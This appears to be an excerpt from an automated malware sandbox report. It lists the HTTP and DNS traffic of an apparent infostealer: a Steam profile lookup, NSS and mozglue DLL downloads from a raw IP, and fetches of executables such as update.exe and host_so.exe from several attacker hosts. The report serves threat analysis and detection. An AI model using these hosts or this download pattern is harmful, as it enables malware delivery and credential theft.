Source: global traffic	HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic	HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic	HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic	HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231

Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp

Source: global traffic	DNS traffic detected: DNS query: dbfhns.in
Source: global traffic	DNS traffic detected: DNS query: whispedwoodmoodsksl.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:23:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDmw_c^nUSssD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:23:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/
Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/S
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2416372141.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2558054153.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/file/host_so.exe
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
